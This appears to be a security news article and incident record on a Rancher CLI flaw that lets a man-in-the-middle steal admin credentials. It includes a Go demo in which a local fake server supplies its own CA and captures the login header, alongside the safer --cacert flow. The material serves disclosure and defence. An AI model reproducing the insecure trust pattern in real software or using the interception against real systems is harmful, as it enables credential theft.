High-Severity Flaw in Rancher Manager Exposes Admin Credentials via MITM Attacks
A newly disclosed vulnerability in Rancher Manager, tracked as CVE-2025-67601 (advisory GHSA-mc24-7m59-4q5p), could allow attackers to intercept administrator login credentials during Rancher CLI operations. The flaw, rated High severity, was published last week by security researcher samjustus.
The affected code lives in the github.com/rancher/rancher Go module. The flaw is triggered when a user runs rancher login with the --skip-verify flag but without --cacert. In that configuration the CLI opens a TLS connection to Rancher Manager without validating the server certificate, reads the CA bundle published in Rancher Manager's internal cacerts setting, and then trusts that bundle for the rest of the login. Because the trust anchor itself arrives over an unverified channel, an attacker positioned between the CLI and Rancher Manager can substitute their own CA and then read the basic authentication header and the session token exchanged during login.
The root cause is improper TLS certificate validation: --skip-verify disables server certificate checks, yet the CLI still fetches its list of trusted CA certificates from the very server it has not verified, so the trust anchor is attacker-controllable. An attacker who injects a malicious CA certificate at that step can impersonate Rancher Manager for the remainder of the session, steal credentials and push unauthorized cluster configuration changes, compromising both the confidentiality and the integrity of the managed clusters. The technique maps to MITRE ATT&CK T1557 (Adversary-in-the-Middle, formerly named Man-in-the-Middle).
Affected Versions & Mitigation
The Rancher team has released patched versions that address the flaw by removing automatic CA certificate fetching during login; earlier releases on the same branches remain affected, so upgrade to:
- v2.13.2
- v2.12.6
- v2.11.10
- v2.10.11
Until the upgrade is applied, do not rely on --skip-verify: always pass --cacert with the Rancher Manager CA certificate when running rancher login, particularly where Rancher is deployed with a self-signed or private CA. Security teams should also check whether rancher login traffic crosses untrusted networks, treat administrator tokens obtained through --skip-verify logins over such networks as potentially exposed, and prioritize updating to the latest patched release.
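The failure mode described above (a trust anchor fetched over the very connection it is meant to protect) and the --cacert workaround, as an added example. This is not Rancher's code: it is a self-contained Go model of the two login flows run against a constructed in-process server that plays the attacker. The API paths (/v3/settings/cacerts, /v3-public/localProviders/local), the response bodies, the admin:hunter2 credentials and the throwaway operator CA are all assumptions made for the demo; only the trust logic is the point, and it generalizes to any client that bootstraps its CA bundle from an unauthenticated response.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"errors"
	"fmt"
	"io"
	"math/big"
	"net/http"
	"net/http/httptest"
	"time"
)

// mitm stands in for an attacker between the CLI and Rancher Manager: it answers
// the cacerts setting with its own certificate and records the Authorization
// header of the login that follows. Paths and bodies are assumptions for the demo.
type mitm struct {
	srv          *httptest.Server
	capturedAuth string
}

func newMITM() *mitm {
	m := &mitm{}
	mux := http.NewServeMux()
	mux.HandleFunc("/v3/settings/cacerts", func(w http.ResponseWriter, r *http.Request) {
		// Attacker-chosen "trusted CA": the MITM's own self-signed certificate.
		w.Write(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: m.srv.Certificate().Raw}))
	})
	mux.HandleFunc("/v3-public/localProviders/local", func(w http.ResponseWriter, r *http.Request) {
		m.capturedAuth = r.Header.Get("Authorization") // credential theft happens here
		w.Write([]byte(`{"token":"attacker-issued"}`))
	})
	m.srv = httptest.NewTLSServer(mux) // self-signed cert, unknown to any real trust store
	return m
}

// loginWithCA is the --cacert flow: the login request trusts only the CAs in caPEM.
func loginWithCA(serverURL, basicAuth string, caPEM []byte) (string, error) {
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return "", errors.New("no usable CA certificate supplied")
	}
	client := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{RootCAs: pool}}}
	req, _ := http.NewRequest(http.MethodPost, serverURL+"/v3-public/localProviders/local?action=login", nil)
	req.Header.Set("Authorization", "Basic "+basicAuth)
	resp, err := client.Do(req)
	if err != nil {
		return "", err // verification fails in the handshake, before the header leaves the client
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return string(body), err
}

// loginSkipVerify mirrors the pre-patch --skip-verify flow without --cacert: the
// cacerts setting is fetched with verification disabled, and whatever comes back
// becomes the trust anchor, so whoever controls that first hop chooses the CA.
func loginSkipVerify(serverURL, basicAuth string) (string, error) {
	insecure := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}
	resp, err := insecure.Get(serverURL + "/v3/settings/cacerts")
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	caPEM, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", err
	}
	return loginWithCA(serverURL, basicAuth, caPEM) // same code path, attacker-supplied anchor
}

// operatorCAPEM builds a throwaway CA standing in for the real Rancher CA an
// operator would pass via --cacert (constructed for this example).
func operatorCAPEM() []byte {
	key, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "rancher-operator-ca"},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour),
		IsCA: true, BasicConstraintsValid: true, KeyUsage: x509.KeyUsageCertSign,
	}
	der, _ := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
}

func main() {
	m := newMITM()
	defer m.srv.Close()
	creds := "YWRtaW46aHVudGVyMg==" // base64("admin:hunter2"), constructed credentials
	_, err := loginSkipVerify(m.srv.URL, creds)
	fmt.Printf("--skip-verify flow: err=%v, attacker captured %q\n", err, m.capturedAuth)
	m.capturedAuth = ""
	_, err = loginWithCA(m.srv.URL, creds, operatorCAPEM())
	fmt.Printf("--cacert flow:      err=%v, attacker captured %q\n", err, m.capturedAuth)
}
```

Run it with go run. The first flow "succeeds" and the attacker ends up holding the full Authorization header; the second fails inside the TLS handshake with an unknown-authority error before any header is sent, and a malformed CA file is rejected outright. Note that the vulnerable flow reuses the hardened function unchanged: the defect is not in how the CLI validates certificates but in where the CA it validates against comes from, which is why the fix is to stop fetching it rather than to tweak validation.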
Source: https://cyberpress.org/rancher-manager-security-bug/
Rancher cybersecurity rating report: https://www.rankiteo.com/company/rancher
Incident record
- ID: RAN1770216204 (linkid: rancher)
- Type: Vulnerability (Vulnerability Exploitation); vulnerability exploited: CVE-2025-67601
- Date: 1/2026
- Severity score: 85; impact score: 4 (attack with significant impact, including customer data leaks)
- Affected entity: Rancher (SUSE), software vendor, cloud computing / container management
- Attack vector: Man-in-the-Middle (MITM)
- Data at risk: authentication credentials (basic auth headers, session tokens); sensitivity: High
- Impact: administrator login credentials compromised; identity theft risk High if credentials are intercepted; operational impact: unauthorized cluster configuration changes and potential compromise of Rancher clusters; systems affected: Rancher Manager clusters
- Root cause: improper TLS certificate validation in the Rancher CLI when --skip-verify is used without --cacert
- Corrective action: removal of automatic CA certificate fetching during login in the patched versions
- Lesson learned: validate TLS certificates properly and never use --skip-verify without --cacert in Rancher CLI operations
- Recommendations: upgrade to the patched Rancher Manager versions (v2.13.2, v2.12.6, v2.11.10, v2.10.11); always use --cacert with a valid CA certificate when logging into the Rancher CLI; assess whether Rancher CLI connections traverse untrusted networks
- Response: containment by using --cacert with a valid CA certificate for rancher login; enhanced monitoring of Rancher CLI connections crossing untrusted networks; remediation by upgrading to the patched versions
- Reference: GitHub Advisory, https://github.com/advisories/GHSA-mc24-7m59-4q5p